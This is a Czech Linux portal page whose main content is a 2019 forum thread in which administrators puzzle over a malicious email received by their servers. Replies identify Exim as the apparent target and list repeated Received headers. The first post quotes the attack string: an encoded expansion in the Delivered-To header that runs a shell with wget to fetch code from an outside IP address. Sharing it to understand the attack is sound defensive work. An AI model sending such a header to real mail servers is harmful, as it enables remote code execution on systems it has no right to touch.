Přihlášení | Registrace

napište » Zprávičky

PF 2026

dnes 15:00 | Nová verze

Všem vše nejlepší do nového roku 2026.

dnes 13:33 | Zajímavý software

Crown je multiplatformní open source herní engine. Zdrojové kódy jsou k dispozici na GitHubu pod licencí MIT a GPLv3+. Byla vydána nová verze 0.60. Vyzkoušet lze online demo.

Ladislav Hagara | Komentářů: 0

curl bez strcpy()

dnes 12:11 | Zajímavý článek

Daniel Stenberg na svém blogu informuje, že po strncpy() byla ze zdrojových kódů curlu odstraněna také všechna volání funkce strcpy(). Funkci strcpy() nahradili vlastní funkcí curlx_strcopy().

Ladislav Hagara | Komentářů: 1

Shotcut 25.12.30

dnes 03:00 | Nová verze

Byla vydána nová verze 25.12.30 svobodného multiplatformního video editoru Shotcut (Wikipedie) postaveného nad multimediálním frameworkem MLT. Shotcut je vedle zdrojových kódů k dispozici také ve formátech AppImage, Flatpak a Snap.

Ladislav Hagara | Komentářů: 0

To nej roku 2025 ve službě Steam

včera 18:55 | IT novinky

Společnost Valve publikovala přehled To nej roku 2025 ve službě Steam aneb ohlédnutí za nejprodávanějšími, nejhranějšími a dalšími nej hrami roku 2025.

Ladislav Hagara | Komentářů: 0

Výsledky průzkumu mezi uživateli Blenderu

včera 16:11 | Komunita

Byly publikovány výsledky průzkumu mezi uživateli Blenderu uskutečněného v říjnu a listopadu 2025. Zúčastnilo se více než 5000 uživatelů.

Ladislav Hagara | Komentářů: 0

CVE-2025-14847 aneb MongoBleed

včera 03:33 | Bezpečnostní upozornění

V dokumentově orientované databázi MongoDB byla nalezena a v upstreamu již opravena kritická bezpečností chyba CVE-2025-14847 aneb MongoBleed.

Ladislav Hagara | Komentářů: 0

Nalezena kopie Unixu V4

29.12. 23:11 | IT novinky

Při úklidu na Utažské univerzitě se ve skladovacích prostorách náhodou podařilo nalézt magnetickou pásku s kopií Unixu V4. Páska byla zaslána do počítačového muzea, kde se z pásky úspěšně podařilo extrahovat data a Unix spustit. Je to patrně jediný známý dochovaný exemplář tohoto 52 let starého Unixu, prvního vůbec programovaného v jazyce C.

🇨🇽 | Komentářů: 4

FFmpeg nechal smazat repozitář porušující LGPL

29.12. 15:55 | Komunita

FFmpeg nechal kvůli porušení autorských práv odstranit z GitHubu jeden z repozitářů patřících čínské technologické firmě Rockchip. Důvodem bylo porušení LGPL ze strany Rockchipu. Rockchip byl FFmpegem na porušování LGPL upozorněn již téměř před dvěma roky.

🇨🇽 | Komentářů: 7

witr (why-is-this-running)

29.12. 15:44 | Zajímavý software

K dispozici je nový CLI nástroj witr sloužící k analýze běžících procesů. Název je zkratkou slov why-is-this-running, 'proč tohle běží'. Klade si za cíl v 'jediném, lidsky čitelném, výstupu vysvětlit odkud daný spuštěný proces pochází, jak byl spuštěn a jaký řetězec systémů je zodpovědný za to, že tento proces právě teď běží'. Witr je napsán v jazyce Go.

🇨🇽 | Komentářů: 1

Centrum | Napsat | Starší

navrhněte » Anketa

Kdo vám letos nadělí dárek?

Ježíšek (31%)

Santa Claus (1%)

Děda Mráz (26%)

La Befana (1%)

Odin (1%)

Laskakit (1%)

Někdo z rodiny (11%)

Já sám (11%)

Nikdo (18%)

Celkem 209 hlasů

Komentářů: 21, poslední včera 18:58

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Mail attack

Štítky: doména, mail, skript, stahování, wget

Dotaz: Mail attack

11.7.2019 19:51 alkoholik | skóre: 40 | blog: Alkoholik
Mail attack

Přečteno: 602×

Odpovědět | Admin

Obcas mi prijde email adresovany velice zvlastnim zpusobem. V Delivered-To je neco jako:


root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f10.20.30.40x22}}@moje.domena

Je jasne, ze by se mel nekde pustit skript stazeny pres wget. Nemate nekdo tuseni, co presne se snazi prostrelit?
Misto 10.20.30.40 bylo moje skutecne ip a domenu jsem taky zmenil.

Řešení dotazu:

Komentář #3 (Jendа, 1 hlasů)

Nástroje: Začni sledovat (1) ?

Odpovědi

11.7.2019 20:19 Pavel 'TIGER' Růžička | skóre: 54
Rozbalit Rozbalit vše Re: Mail attack

Vypadá to na novější "aktualizovanou verzi" pro získání údajů nad kontrolou domény.

11.7.2019 22:33 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack

Me spis zajima, ktery mail daemon/klient by jako mel mit ten super napad, ze pusti shell s wgetem. Exim? Postfix? Procmail? Nejaky soft na analyzovani logu?

Řešení 1× (alkoholik (tazatel))

12.7.2019 02:56 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Mail attack

Exim. Všimni si, že (minimálně v exempláři který přišel mně) je tam hromada Received: hlaviček.

12.7.2019 08:41 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack

Jo, muj vypada skoro stejne.

12.7.2019 13:53 madmucho
Rozbalit Rozbalit vše Re: Mail attack

Vypadá to že to pouští patrně i filtr amavisu , našel jsem toto na svém serveru také,

neco to stahuje nedotahne, poslal mi to postfix jako že padlo na špatné hlavičky do karantény.

Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
Message-Id: <20190711125952.3895A9F13B@bla bla>
Date: Thu, 11 Jul 2019 14:59:52 +0200 (CEST)
From: root@sab.com

Založit nové vlákno • Nahoru

Tiskni Sdílej:

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje